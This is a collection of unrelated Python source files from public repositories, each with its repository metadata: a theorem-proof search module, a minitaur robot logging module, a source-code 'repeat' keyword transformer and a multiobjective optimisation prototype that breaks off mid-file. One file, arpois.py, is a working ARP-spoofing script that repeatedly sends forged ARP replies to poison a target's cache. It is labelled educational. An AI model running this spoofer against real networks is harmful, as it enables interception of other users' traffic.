from MatchAndSubstitute import is_rule, Direction, is_equality
# from pprint import pprint
from typing import List, Mapping, Dict, Sequence, Iterator
from typing import Optional, Union
from typing import TypeVar
# Wish I could make this a NamedTuple, but recursively typed NamedTuples and
# mypy are currently broken, see https://github.com/python/mypy/issues/3836
# class ExprAndParent(NamedTuple):
# expr: Expression
# parent: 'ExprAndParent'
class ExprAndParent:
_expr: Expression
_parent: "ExprAndParent"
def __init__(
self, expr: Expression, parent: Optional["ExprAndParent"]
) -> None:
self._expr = expr
self._parent = parent
@property
def expr(self) -> Expression:
return self._expr
@property
def parent(self) -> "ExprAndParent":
"""Return type should really be the actual (derived) class of self."""
return self._parent
def __repr__(self) -> str:
return repr(self._expr) + " & parent"
def collect_path(start: ExprAndParent) -> List[Expression]:
ret = []
while start is not None:
ret.append(start.expr)
start = start.parent
return ret
EAndP = TypeVar("EAndP", bound=ExprAndParent)
class Exprs(Mapping[Expression, EAndP]):
"""Mutable collection of ExprAndParent subclasses. Given an Expr (that
you just generated), can tell you whether it's already been generated,
and gives you the ExprAndParent. Also allows you to iterate over the
exprs. """
_exprs_map: Dict[Expression, EAndP]
_parent: Optional["Exprs"]
_exprs_rules: List[EAndP]
_exprs_non_rules: List[EAndP]
def __init__(
self, exprs: Sequence[EAndP], parent: Optional["Exprs"] = None
) -> None:
self._parent = parent
self._exprs_non_rules = [e for e in exprs if not is_rule(e.expr)]
self._exprs_rules = [e for e in exprs if is_rule(e.expr)]
self._exprs_map = {
expr.expr: expr
for expr in self._exprs_non_rules + self._exprs_rules
}
def add(self, expr_and_parent: EAndP) -> None:
if is_rule(expr_and_parent.expr):
self._exprs_rules.append(expr_and_parent)
else:
self._exprs_non_rules.append(expr_and_parent)
self._exprs_map[expr_and_parent.expr] = expr_and_parent
def __contains__(self, expr: Expression) -> bool:
"""Used to tell whether or not we've generated this expr before,
so always checks all parents as well as itself."""
return bool(
expr in self._exprs_map or (self._parent and expr in self._parent)
)
def __getitem__(self, key: Expression) -> EAndP:
if key in self._exprs_map:
return self._exprs_map[key]
return self._parent[key]
# Used to iterate over all expressions, to see if a newly generated
# expression is an instance of any of them, meaning the proof is done.
def __iter__(self) -> Iterator[Expression]:
return [expr.expr for expr in self.all_exprs()].__iter__()
def __len__(self) -> int:
return len(self._exprs_map) + (len(self._parent) if self._parent else 0)
def __repr__(self) -> str:
return "\n".join(str(expr) for expr in self)
def immediate_rules(self) -> List[EAndP]:
return self._exprs_rules
def immediate_non_rules(self) -> List[EAndP]:
return self._exprs_non_rules
def all_rules(self) -> List[EAndP]:
if self._parent:
return self._parent.all_rules() + self._exprs_rules
else:
return self._exprs_rules
def all_exprs(self) -> List[EAndP]:
# This won't work in general, because when we add a rule, it will change
# the index of all elements of exprs_list. Oi.
return self._exprs_non_rules + self._exprs_rules + (
self._parent.all_exprs() if self._parent else []
)
def equalities(self) -> List[EAndP]:
# Returns a List, rather than Sequence or Iterable, because Python
# makes dealing with sequences slightly inconvenient: list's "+" only
# takes other lists, not sequences. So, concatenating a sequence
# onto a list is done "temp = [ ... ]; temp.extend(seq); return
# temp." I'd rather have the clarity of just "return [ ... ] + seq".
parent_equalities = self.parent.equalities() if self._parent else []
return [
rule for rule in self._exprs_rules if is_equality(rule._expr)
] + parent_equalities
# Why do Exprs and ProofState both have parents? I think they must point to
# the same thing, i.e. ProofState._parent.context == ProofState.context._parent.
class ProofState:
goals: Exprs[EAndP]
context: Exprs[EAndP]
# This really needs to be a list, mapping variable to expression that
# defines it.
definitions: Exprs[EAndP]
_parent: Optional["ProofState"]
verbosity: int
def __init__(
self,
context: Sequence[ExprAndParent],
goals: Sequence[ExprAndParent],
parent: Optional["ProofState"],
verbosity: int,
) -> None:
self.verbosity = verbosity
self._parent = parent
# context and goals are actually not used in any method. So this
# class is more like a C++ struct than a class. Yikes!
self.context = Exprs(context, getattr(parent, "context", None))
# Only the "brute force" constructor takes a second argument here,
# which is I think why PyCharm is complaining.
self.goals = Exprs(goals, getattr(parent, "goals", None))
def _is_instance(self, expr: Expression, rule: Expression):
"""Wraps MatchAndSubstitute.is_instance to print if verbose."""
subs = MatchAndSubstitute.is_instance(expr, rule)
if self.verbosity > 0 and subs is not None:
print(
str(expr)
+ " is an instance of "
+ str(rule)
+ " subs "
+ str(subs)
+ " !!!!!!"
)
return subs
def _match_against_exprs(
self, move: Expression, targets: Mapping[Expression, EAndP]
) -> Optional[EAndP]:
"""Determines whether move equals or is_instance any
element of targets.
If so, returns the element. If not, returns None.
From self, only uses verbosity.
"""
if move in targets:
return targets[move]
return next(
(
targets[target]
for target in targets
if self._is_instance(move, target) is not None
),
None,
)
def try_rule(
self, rule: Expression, expr_and_parent_in: EAndP, direction: Direction
) -> Union[bool, List[Expression]]:
"""Applies "rule" to "expr_and_parent_in", updating self with
generated expressions.
A wrapper around MatchAndSubstitute.try_rule().
If that finishes the proof, returns path from start to goal.
Otherwise, adds the any expressions to context (if forward) or
goals (if backward), and returns a bool as to whether or not it at
least generated a new expression.
"""
assert isinstance(rule, CompositeExpression)
assert is_rule(rule)
assert direction == Direction.FORWARD or direction == Direction.BACKWARD
# For return type, could really use one of those "value or error" types,
# so that if callers don't get the bool, they'll return right away too.
already_seen: Exprs[EAndP]
targets: Exprs[EAndP]
if direction == Direction.FORWARD:
already_seen = self.context
targets = self.goals
else:
already_seen = self.goals
targets = self.context
exprs = MatchAndSubstitute.try_rule(
rule, expr_and_parent_in.expr, direction
)
if self.verbosity >= 10 or (self.verbosity > 0 and exprs):
print(
f"try_rule: {rule} transformed {expr_and_parent_in.expr} into {exprs}"
)
added = False
for move in exprs:
if move in already_seen:
continue
move_and_parent = expr_and_parent_in.__class__(
move, expr_and_parent_in
)
# Ideally, in the case of P in B -> P * M == M * P, we'd
# recognize that the latter is equivalent to the former, and is
# strictly more useful so we can get rid of the former. But I
# think that takes some global knowledge of the proof, e.g. that
# "P in B" doesn't appear in the goal in any form, or in any
# other premises, etc. So we'll skip that for now.
found = self._match_against_exprs(move, targets)
if found:
if direction == Direction.FORWARD:
return list(reversed(collect_path(found))) + collect_path(
move_and_parent
)
else:
return list(
reversed(collect_path(move_and_parent))
) + collect_path(
found
)
already_seen.add(move_and_parent)
added = True
return added
# Should this go in a derived class, since its a (brute force) search
# strategy? Oh well.
def try_all_rules(
self, non_rules: List[EAndP], rules: List[EAndP], direction: Direction
) -> Union[bool, List[Expression]]:
"""calls try_rule() for each pair of rules and non_rules."""
made_progress = False
for cont in non_rules:
if self.verbosity > 0:
print("*** " + str(direction) + " *** " + str(cont.expr))
for rule in rules:
if self.verbosity >= 10:
print("Rule: " + str(rule.expr))
found = self.try_rule(rule.expr, cont, direction)
if isinstance(found, bool):
made_progress = made_progress or found
else:
return found
return made_progress
| {
"repo_name": "martincmartin/MathematiciansAssistant",
"path": "ProofSystem.py",
"copies": "1",
"size": "11232",
"license": "apache-2.0",
"hash": 8800322451541661000,
"line_mean": 35.5863192182,
"line_max": 86,
"alpha_frac": 0.6030092593,
"autogenerated": false,
"ratio": 4.017167381974249,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0002787241920118478,
"num_lines": 307
} |
# A proof of concept ARP spoofer by Erethon
# Please check README.md and LICENSE files.
# The purpose of this script is stricly educational. It's a proof of concept
# and I haven't really tested it, so I don't know if it will work.
# Once again this is to be used for educational purposes only, I am in no way
# responsible for misuse of it.
# Usage: python arpois.py interface target_ip spoofing_ip.
from binascii import unhexlify
import socket
from sys import argv
from time import sleep
from uuid import getnode
from re import search
import subprocess
def get_src_mac():
mac_dec = hex(getnode())[2:-1]
while (len(mac_dec) != 12):
mac_dec = "0" + mac_dec
return unhexlify(mac_dec)
def create_dst_ip_addr():
dst_ip_addr = ''
ip_src_dec = argv[2].split(".")
for i in range(len(ip_src_dec)):
dst_ip_addr += chr(int(ip_src_dec[i]))
return dst_ip_addr
def get_src_ip_addr():
src_ip_addr = ''
ip_src_dec = argv[3].split(".")
for i in range(len(ip_src_dec)):
src_ip_addr += chr(int(ip_src_dec[i]))
return src_ip_addr
def get_dst_mac_addr():
p = subprocess.Popen(["arping", argv[2], "-c", "1", "-i", argv[1]],
shell=False, stdout=subprocess.PIPE)
sleep(2)
remote_mac = search('(([0-9a-f]{2}:){5}[0-9a-f]{2})', p.communicate()[0])
return unhexlify(remote_mac.group(0).replace(':', ''))
def create_pkt_arp_poison():
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.SOCK_RAW)
s.bind((argv[1], 0))
src_addr = get_src_mac()
dst_addr = get_dst_mac_addr()
src_ip_addr = get_src_ip_addr()
dst_ip_addr = create_dst_ip_addr()
dst_mac_addr = "\x00\x00\x00\x00\x00\x00"
payload = "\x00\x01\x08\x00\x06\x04\x00\x02"
checksum = "\x00\x00\x00\x00"
ethertype = "\x08\x06"
while(1):
sleep(2)
s.send(dst_addr + src_addr + ethertype + payload+src_addr + src_ip_addr
+ dst_mac_addr + dst_ip_addr + checksum)
print "Sending forged packets to " + argv[2]
if (len(argv) != 4):
print "Usage: python arpois.py interface target_ip spoofing_ip."
print "Example: python arpois.py wlan0 192.168.1.42 192.168.1.1"
exit()
create_pkt_arp_poison()
| {
"repo_name": "Erethon/ArPois.py",
"path": "arpois.py",
"copies": "1",
"size": "2239",
"license": "mit",
"hash": -2107293771276831000,
"line_mean": 29.6712328767,
"line_max": 79,
"alpha_frac": 0.6248325145,
"autogenerated": false,
"ratio": 2.859514687100894,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8981085622996849,
"avg_score": 0.0006523157208088715,
"num_lines": 73
} |
# A proof of concept to show how to replace a fictitious keyword "repeat"
def transform_source_code(text):
'''Replaces instances of
repeat n:
where "n" is an integer, by
for VAR_i in range(n):
where VAR_i is a string that does not appear elsewhere
in the code sample. This code is not robust and is more
a proof of concept than anything else.
'''
loop_keyword = 'repeat'
nb = text.count(loop_keyword)
if nb == 0:
return text
var_names = get_unique_variable_names(text, nb)
processed_lines = []
for line in text.splitlines():
stripped = line.strip()
if stripped.startswith(loop_keyword):
# remove end of line comment if present
stripped = stripped.split('#')[0]
if ':' in stripped:
stripped = stripped.replace(loop_keyword, '')
stripped = stripped.replace(':', '')
index = line.find(loop_keyword)
try:
# instead of simply allowing an int like "3",
# let's be a bit more lenient an allow things like
# "(3)" or "2*4"
n = eval(stripped)
assert isinstance(n, int)
line = '{0}for {1} in range({2}):'.format(
' '*index, var_names.pop(), n)
except: # any error leaves line unchanged
pass # This could definitely be improved upon.
processed_lines.append(line)
result = '\n'.join(processed_lines)
return result
def get_unique_variable_names(text, nb):
'''returns a list of possible variables names that
are not found in the original text'''
base_name = 'VAR_'
var_names = []
i = 0
j = 0
while j < nb:
tentative_name = base_name + str(i)
if text.count(tentative_name) == 0:
var_names.append(tentative_name)
j += 1
i += 1
return var_names
if __name__ == '__main__':
sample = '''
repeat 3: # first loop
print('VAR_1')
repeat (2*2):
pass
'''
comparison = '''
for VAR_2 in range(3):
print('VAR_1')
for VAR_0 in range(4):
pass
'''
if comparison == transform_source_code(sample):
print("Transformation done correctly")
else:
print("Transformation done incorrectly")
print("Expected code:\n", comparison)
print("\nResult:\n", transform_source_code(sample))
| {
"repo_name": "aroberge/python_experiments",
"path": "version1/repeat_keyword.py",
"copies": "3",
"size": "2597",
"license": "cc0-1.0",
"hash": -6889070124189562000,
"line_mean": 28.5113636364,
"line_max": 73,
"alpha_frac": 0.5271467077,
"autogenerated": false,
"ratio": 4.215909090909091,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0006102693602693602,
"num_lines": 88
} |
"""A proto buffer based logging system for minitaur experiments.
The logging system records the time since reset, base position, orientation,
angular velocity and motor information (joint angle, speed, and torque) into a
proto buffer. See minitaur_logging.proto for more details. The episode_proto is
updated per time step by the environment and saved onto disk for each episode.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0, parentdir)
import datetime
import os
import time
import tensorflow as tf
from pybullet_envs.minitaur.envs import minitaur_logging_pb2
NUM_MOTORS = 8
def _update_base_state(base_state, values):
base_state.x = values[0]
base_state.y = values[1]
base_state.z = values[2]
def preallocate_episode_proto(episode_proto, max_num_steps):
"""Preallocate the memory for proto buffer.
Dynamically allocating memory as the protobuf expands causes unexpected delay
that is not tolerable with locomotion control.
Args:
episode_proto: The proto that holds the state/action data for the current
episode.
max_num_steps: The max number of steps that will be recorded in the proto.
The state/data over max_num_steps will not be stored in the proto.
"""
for _ in range(max_num_steps):
step_log = episode_proto.state_action.add()
step_log.info_valid = False
step_log.time.seconds = 0
step_log.time.nanos = 0
for _ in range(NUM_MOTORS):
motor_state = step_log.motor_states.add()
motor_state.angle = 0
motor_state.velocity = 0
motor_state.torque = 0
motor_state.action = 0
_update_base_state(step_log.base_position, [0, 0, 0])
_update_base_state(step_log.base_orientation, [0, 0, 0])
_update_base_state(step_log.base_angular_vel, [0, 0, 0])
def update_episode_proto(episode_proto, minitaur, action, step):
"""Update the episode proto by appending the states/action of the minitaur.
Note that the state/data over max_num_steps preallocated
(len(episode_proto.state_action)) will not be stored in the proto.
Args:
episode_proto: The proto that holds the state/action data for the current
episode.
minitaur: The minitaur instance. See envs.minitaur for details.
action: The action applied at this time step. The action is an 8-element
numpy floating-point array.
step: The current step index.
"""
max_num_steps = len(episode_proto.state_action)
if step >= max_num_steps:
tf.logging.warning("{}th step is not recorded in the logging since only {} steps were "
"pre-allocated.".format(step, max_num_steps))
return
step_log = episode_proto.state_action[step]
step_log.info_valid = minitaur.IsObservationValid()
time_in_seconds = minitaur.GetTimeSinceReset()
step_log.time.seconds = int(time_in_seconds)
step_log.time.nanos = int((time_in_seconds - int(time_in_seconds)) * 1e9)
motor_angles = minitaur.GetMotorAngles()
motor_velocities = minitaur.GetMotorVelocities()
motor_torques = minitaur.GetMotorTorques()
for i in range(minitaur.num_motors):
step_log.motor_states[i].angle = motor_angles[i]
step_log.motor_states[i].velocity = motor_velocities[i]
step_log.motor_states[i].torque = motor_torques[i]
step_log.motor_states[i].action = action[i]
_update_base_state(step_log.base_position, minitaur.GetBasePosition())
_update_base_state(step_log.base_orientation, minitaur.GetBaseRollPitchYaw())
_update_base_state(step_log.base_angular_vel, minitaur.GetBaseRollPitchYawRate())
class MinitaurLogging(object):
"""A logging system that records the states/action of the minitaur."""
def __init__(self, log_path=None):
self._log_path = log_path
# TODO(jietan): Consider using recordio to write the logs.
def save_episode(self, episode_proto):
"""Save episode_proto to self._log_path.
self._log_path is the directory name. A time stamp is the file name of the
log file. For example, when self._log_path is "/tmp/logs/", the actual
log file would be "/tmp/logs/yyyy-mm-dd-hh:mm:ss".
Args:
episode_proto: The proto that holds the states/action for the current
episode that needs to be save to disk.
Returns:
The full log path, including the directory name and the file name.
"""
if not self._log_path or not episode_proto.state_action:
return self._log_path
if not tf.gfile.Exists(self._log_path):
tf.gfile.MakeDirs(self._log_path)
ts = time.time()
time_stamp = datetime.datetime.fromtimestamp(ts).strftime("%Y-%m-%d-%H%M%S")
log_path = os.path.join(self._log_path, "minitaur_log_{}".format(time_stamp))
with tf.gfile.Open(log_path, "w") as f:
f.write(episode_proto.SerializeToString())
return log_path
def restore_episode(self, log_path):
"""Restore the episodic proto from the log path.
Args:
log_path: The full path of the log file.
Returns:
The minitaur episode proto.
"""
with tf.gfile.Open(log_path, 'rb') as f:
content = f.read()
episode_proto = minitaur_logging_pb2.MinitaurEpisode()
episode_proto.ParseFromString(content)
return episode_proto
| {
"repo_name": "MTASZTAKI/ApertusVR",
"path": "plugins/physics/bulletPhysics/3rdParty/bullet3/examples/pybullet/gym/pybullet_envs/minitaur/envs/minitaur_logging.py",
"copies": "2",
"size": "5395",
"license": "mit",
"hash": 3146372956271149000,
"line_mean": 36.7272727273,
"line_max": 91,
"alpha_frac": 0.7069508804,
"autogenerated": false,
"ratio": 3.3488516449410306,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5055802525341031,
"avg_score": null,
"num_lines": null
} |
"""a prototype multiobjective opt under uncertainty algorithm
"""
import os
import numpy as np
import pandas as pd
import pyemu
from .ensemble_method import EnsembleMethod
class ParetoObjFunc(object):
"""multiobjective function calculator."""
def __init__(self, pst, obj_function_dict, logger):
self.logger = logger
self.pst = pst
self.max_distance = 1.0e30
obs = pst.observation_data
pi = pst.prior_information
self.obs_dict, self.pi_dict = {}, {}
for name, direction in obj_function_dict.items():
if name in obs.obsnme:
if direction.lower().startswith("max"):
self.obs_dict[name] = "max"
elif direction.lower().startswith("min"):
self.obs_dict[name] = "min"
else:
self.logger.lraise(
"unrecognized direction for obs obj func {0}:'{1}'".format(
name, direction
)
)
elif name in pi.pilbl:
if direction.lower().startswith("max"):
self.pi_dict[name] = "max"
elif direction.lower().startswith("min"):
self.pi_dict[name] = "min"
else:
self.logger.lraise(
"unrecognized direction for pi obj func {0}:'{1}'".format(
name, direction
)
)
else:
self.logger.lraise("objective function not found:{0}".format(name))
if len(self.pi_dict) > 0:
self.logger.lraise("pi obj function not yet supported")
self.logger.statement(
"{0} obs objective functions registered".format(len(self.obs_dict))
)
for name, direction in self.obs_dict.items():
self.logger.statement(
"obs obj function: {0}, direction: {1}".format(name, direction)
)
self.logger.statement(
"{0} pi objective functions registered".format(len(self.pi_dict))
)
for name, direction in self.pi_dict.items():
self.logger.statement(
"pi obj function: {0}, direction: {1}".format(name, direction)
)
self.is_nondominated = self.is_nondominated_continuous
self.obs_obj_names = list(self.obs_dict.keys())
def is_feasible(self, obs_df, risk=0.5):
"""identify which candidate solutions in obs_df (rows)
are feasible with respect obs constraints (obs_df)
Parameters
----------
obs_df : pandas.DataFrame
a dataframe with columns of obs names and rows of realizations
risk : float
risk value. If != 0.5, then risk shifting is used. Otherwise, the
obsval in Pst is used. Default is 0.5.
Returns
-------
is_feasible : pandas.Series
series with obs_df.index and bool values
"""
# todo deal with pi eqs
is_feasible = pd.Series(data=True, index=obs_df.index)
for lt_obs in self.pst.less_than_obs_constraints:
if risk != 0.5:
val = self.get_risk_shifted_value(risk, obs_df.loc[lt_obs])
else:
val = self.pst.observation_data.loc[lt_obs, "obsval"]
is_feasible.loc[obs_df.loc[:, lt_obs] >= val] = False
for gt_obs in self.pst.greater_than_obs_constraints:
if risk != 0.5:
val = self.get_risk_shifted_value(risk, obs_df.loc[gt_obs])
else:
val = self.pst.observation_data.loc[gt_obs, "obsval"]
is_feasible.loc[obs_df.loc[:, gt_obs] <= val] = False
return is_feasible
@property
def obs_obj_signs(self):
signs = []
for obj in self.obs_obj_names:
if self.obs_dict[obj] == "max":
signs.append(1.0)
else:
signs.append(-1.0)
signs = np.array(signs)
return signs
def dominates(self, sol1, sol2):
d = self.obs_obj_signs * (sol1 - sol2)
if np.all(d >= 0.0) and np.any(d > 0.0):
return True
return False
def is_nondominated_pathetic(self, obs_df):
"""identify which candidate solutions are pareto non-dominated -
super patheically slow...
Parameters
----------
obs_df : pandas.DataFrame
dataframe with columns of observation names and rows of realizations
Returns
-------
is_dominated : pandas.Series
series with index of obs_df and bool series
"""
obj_df = obs_df.loc[:, self.obs_obj_names]
is_nondom = []
for i, iidx in enumerate(obj_df.index):
ind = True
for jidx in obj_df.index:
if iidx == jidx:
continue
# if dominates(jidx,iidx):
# ind = False
# break
if self.dominates(obj_df.loc[jidx, :], obj_df.loc[iidx, :]):
ind = False
break
is_nondom.append(ind)
is_nondom = pd.Series(data=is_nondom, index=obs_df.index, dtype=bool)
return is_nondom
def is_nondominated_continuous(self, obs_df):
"""identify which candidate solutions are pareto non-dominated continuously updated,
but still slow
Parameters
----------
obs_df : pandas.DataFrame
dataframe with columns of observation names and rows of realizations
Returns
-------
is_dominated : pandas.Series
series with index of obs_df and bool series
"""
obj_df = obs_df.loc[:, self.obs_obj_names]
P = list(obj_df.index)
PP = set()
PP.add(P[0])
# iidx = 1
# while iidx < len(P):
for iidx in P:
jidx = 0
drop = []
keep = True
for jidx in PP:
# if dominates(iidx,jidx):
# drop.append(jidx)
# elif dominates(jidx,iidx):
# keep = False
# break
if jidx == iidx:
continue
if self.dominates(obj_df.loc[iidx, :], obj_df.loc[jidx, :]):
drop.append(jidx)
elif self.dominates(obj_df.loc[jidx, :], obj_df.loc[iidx, :]):
keep = False
break
for d in drop:
PP.remove(d)
if keep:
PP.add(iidx)
# iidx += 1
is_nondom = pd.Series(data=False, index=obs_df.index, dtype=bool)
is_nondom.loc[PP] = True
return is_nondom
def is_nondominated_kung(self, obs_df):
"""identify which candidate solutions are pareto non-dominated using Kungs algorithm
Parameters
----------
obs_df : pandas.DataFrame
dataframe with columns of observation names and rows of realizations
Returns
-------
is_dominated : pandas.Series
series with index of obs_df and bool series
"""
obj_df = obs_df.loc[:, self.obs_obj_names]
obj_names = self.obs_obj_names
ascending = False
if self.obs_dict[obj_names[0]] == "min":
ascending = True
obj_df.sort_values(by=obj_names[0], ascending=ascending, inplace=True)
P = list(obj_df.index)
def front(p):
if len(p) == 1:
return p
p = list(
obj_df.loc[p, :].sort_values(by=obj_names[0], ascending=ascending).index
)
half = int(len(p) / 2)
T = front(p[:half])
B = front(p[half:])
M = []
i = 0
while i < len(B):
j = 0
while j < len(T):
# if dominates(T[j],B[i]):
if self.dominates(obj_df.loc[T[j], :], obj_df.loc[B[i], :]):
break
j += 1
if j == len(T):
M.append(B[i])
i += 1
T.extend(M)
return T
PP = front(P)
is_nondom = pd.Series(data=False, index=obs_df.index, dtype=bool)
is_nondom.loc[PP] = True
return is_nondom
def crowd_distance(self, obs_df):
"""determine the crowding distance for each candidate solution
Parameters
----------
obs_df : pandas.DataFrame
dataframe with columns of observation names and rows of realizations
Returns
-------
crowd_distance : pandas.Series
series with index of obs_df and values of crowd distance
"""
# initialize the distance container
crowd_distance = pd.Series(data=0.0, index=obs_df.index)
for name, direction in self.obs_dict.items():
# make a copy - wasteful, but easier
obj_df = obs_df.loc[:, name].copy()
# sort so that largest values are first
obj_df.sort_values(ascending=False, inplace=True)
# set the ends so they are always retained
crowd_distance.loc[obj_df.index[0]] += self.max_distance
crowd_distance.loc[obj_df.index[-1]] += self.max_distance
# process the vector
i = 1
for idx in obj_df.index[1:-1]:
crowd_distance.loc[idx] += obj_df.iloc[i - 1] - obj_df.iloc[i + 1]
i += 1
return crowd_distance
def get_risk_shifted_value(self, risk, series):
n = series.name
if n in self.obs_dict.keys():
d = self.obs_dict[n]
t = "obj"
elif n in self.pst.less_than_obs_constraints:
d = "min"
t = "lt_obs"
elif n in self.pst.greater_than_obs_constraints:
d = "max"
t = "gt_obs"
else:
self.logger.lraise(
"series is not an obs obj func or obs inequality contraint:{0}".format(
n
)
)
ascending = False
if d == "min":
ascending = True
s = series.shape[0]
shift = int(s * risk)
if shift >= s:
shift = s - 1
cdf = series.sort_values(ascending=ascending).apply(np.cumsum)
val = float(cdf.iloc[shift])
# print(cdf)
# print(shift,cdf.iloc[shift])
# self.logger.statement("risk-shift for {0}->type:{1}dir:{2},shift:{3},val:{4}".format(n,t,d,shift,val))
return val
def reduce_stack_with_risk_shift(self, oe, num_reals, risk):
stochastic_cols = list(self.obs_dict.keys())
stochastic_cols.extend(self.pst.less_than_obs_constraints)
stochastic_cols.extend(self.pst.greater_than_obs_constraints)
stochastic_cols = set(stochastic_cols)
vvals = []
for i in range(0, oe.shape[0], num_reals):
oes = oe.iloc[i : i + num_reals]
vals = []
for col in oes.columns:
if col in stochastic_cols:
val = self.get_risk_shifted_value(risk=risk, series=oes.loc[:, col])
# otherwise, just fill with the mean value
else:
val = oes.loc[:, col].mean()
vals.append(val)
vvals.append(vals)
df = pd.DataFrame(data=vvals, columns=oe.columns)
return df
class EvolAlg(EnsembleMethod):
def __init__(
self,
pst,
parcov=None,
obscov=None,
num_workers=0,
use_approx_prior=True,
submit_file=None,
verbose=False,
port=4004,
worker_dir="template",
):
super(EvolAlg, self).__init__(
pst=pst,
parcov=parcov,
obscov=obscov,
num_workers=num_workers,
submit_file=submit_file,
verbose=verbose,
port=port,
worker_dir=worker_dir,
)
def initialize(
self,
obj_func_dict,
num_par_reals=100,
num_dv_reals=100,
dv_ensemble=None,
par_ensemble=None,
risk=0.5,
dv_names=None,
par_names=None,
):
# todo : setup a run results store for all candidate solutions? or maybe
# just nondom, feasible solutions?
# todo : check that the dv ensemble index is not duplicated
self.dv_ensemble_archive = None
self.obs_ensemble_archive = None
if risk != 0.5:
if risk > 1.0 or risk < 0.0:
self.logger.lraise("risk not in 0.0:1.0 range")
self.risk = risk
self.obj_func = ParetoObjFunc(self.pst, obj_func_dict, self.logger)
self.par_ensemble = None
# all adjustable pars are dec vars
if dv_ensemble is None and par_ensemble is None:
self.num_dv_reals = num_dv_reals
if dv_names is not None:
aset = set(self.pst.adj_par_names)
dvset = set(dv_names)
diff = dvset - aset
if len(diff) > 0:
self.logger.lraise(
"the following dv_names were not "
+ "found in the adjustable parameters: {0}".format(
",".join(diff)
)
)
how = {p: "uniform" for p in dv_names}
else:
if risk != 0.5:
self.logger.lraise(
"risk != 0.5 but all adjustable pars are dec vars"
)
how = {p: "uniform" for p in self.pst.adj_par_names}
self.dv_ensemble = pyemu.ParameterEnsemble.from_mixed_draws(
self.pst, how_dict=how, num_reals=num_dv_reals, cov=self.parcov
)
if risk != 0.5:
aset = set(self.pst.adj_par_names)
dvset = set(self.dv_ensemble.columns)
diff = aset - dvset
if len(diff) > 0:
self.logger.lraise(
"risk!=0.5 but all adjustable parameters are dec vars"
)
self.par_ensemble = pyemu.ParameterEnsemble.from_gaussian_draw(
self.pst, num_reals=num_par_reals, cov=self.parcov
)
else:
self.par_ensemble = None
# both par ensemble and dv ensemble were passed
elif par_ensemble is not None and dv_ensemble is not None:
self.num_dv_reals = dv_ensemble.shape[0]
aset = set(self.pst.adj_par_names)
ppset = set(self.pst.par_names)
dvset = set(dv_ensemble.columns)
pset = set(par_ensemble.columns)
diff = ppset - aset
if len(diff) > 0:
self.logger.lraise(
"the following par_ensemble names were not "
+ "found in the pst par names: {0}".format(",".join(diff))
)
if len(diff) > 0:
self.logger.lraise(
"the following dv_ensemble names were not "
+ "found in the adjustable parameters: {0}".format(",".join(diff))
)
self.par_ensemble = par_ensemble
self.dv_ensemble = dv_ensemble
# dv_ensemble supplied, but not pars, so check if any adjustable pars are not
# in dv_ensemble, and if so, draw reals for them
elif dv_ensemble is not None and par_ensemble is None:
self.num_dv_reals = dv_ensemble.shape[0]
aset = set(self.pst.adj_par_names)
dvset = set(dv_ensemble.columns)
diff = dvset - aset
if len(diff) > 0:
self.logger.lraise(
"the following dv_ensemble names were not "
+ "found in the adjustable parameters: {0}".format(",".join(diff))
)
self.dv_ensemble = dv_ensemble
if risk != 0.5:
if par_names is not None:
pset = set(par_names)
diff = pset - aset
if len(diff) > 0:
self.logger.lraise(
"the following par_names were not "
+ "found in the adjustable parameters: {0}".format(
",".join(diff)
)
)
how = {p: "gaussian" for p in par_names}
else:
adj_pars = aset - dvset
if len(adj_pars) == 0:
self.logger.lraise(
"risk!=0.5 but all adjustable pars are dec vars"
)
how = {p: "gaussian" for p in adj_pars}
self.par_ensemble = pyemu.ParameterEnsemble.from_mixed_draws(
self.pst, how_dict=how, num_reals=num_par_reals, cov=self.parcov
)
else:
diff = aset - dvset
if len(diff) > 0:
self.logger.warn(
"adj pars {0} missing from dv_ensemble".format(",".join(diff))
)
df = pd.DataFrame(self.pst.parameter_data.loc[:, "parval1"]).T
self.par_ensemble = pyemu.ParameterEnsemble.from_dataframe(
df=df, pst=self.pst
)
print(self.par_ensemble.shape)
# par ensemble supplied but not dv_ensmeble, so check for any adjustable pars
# that are not in par_ensemble and draw reals. Must be at least one...
elif par_ensemble is not None and dv_ensemble is None:
self.num_dv_reals = num_dv_reals
aset = set(self.pst.par_names)
pset = set(par_ensemble.columns)
diff = aset - pset
if len(diff) > 0:
self.logger.lraise(
"the following par_ensemble names were not "
+ "found in the pst par names: {0}".format(",".join(diff))
)
self.par_ensemble = par_ensemble
if dv_names is None:
self.logger.lraise(
"dv_names must be passed if dv_ensemble is None and par_ensmeble is not None"
)
dvset = set(dv_names)
diff = dvset - aset
if len(diff) > 0:
self.logger.lraise(
"the following dv_names were not "
+ "found in the adjustable parameters: {0}".format(",".join(diff))
)
how = {p: "uniform" for p in dv_names}
self.dv_ensemble = pyemu.ParameterEnsemble.from_mixed_draws(
self.pst,
how_dict=how,
num_reals=num_dv_reals,
cov=self.parcov,
partial=True,
)
self.last_stack = None
self.logger.log(
"evaluate initial dv ensemble of size {0}".format(self.dv_ensemble.shape[0])
)
self.obs_ensemble = self._calc_obs(self.dv_ensemble)
self.logger.log(
"evaluate initial dv ensemble of size {0}".format(self.dv_ensemble.shape[0])
)
isfeas = self.obj_func.is_feasible(self.obs_ensemble, risk=self.risk)
isnondom = self.obj_func.is_nondominated(self.obs_ensemble)
vc = isfeas.value_counts()
if True not in vc:
self.logger.lraise("no feasible solutions in initial population")
self.logger.statement(
"{0} feasible individuals in initial population".format(vc[True])
)
self.dv_ensemble = self.dv_ensemble.loc[isfeas, :]
self.obs_ensemble = self.obs_ensemble.loc[isfeas, :]
vc = isnondom.value_counts()
if True in vc:
self.logger.statement(
"{0} nondominated solutions in initial population".format(vc[True])
)
else:
self.logger.statement("no nondominated solutions in initial population")
self.dv_ensemble = self.dv_ensemble.loc[isfeas, :]
self.obs_ensemble = self.obs_ensemble.loc[isfeas, :]
self.pst.add_transform_columns()
self._initialized = True
@staticmethod
def _drop_failed(failed_runs, dv_ensemble, obs_ensemble):
if failed_runs is None:
return
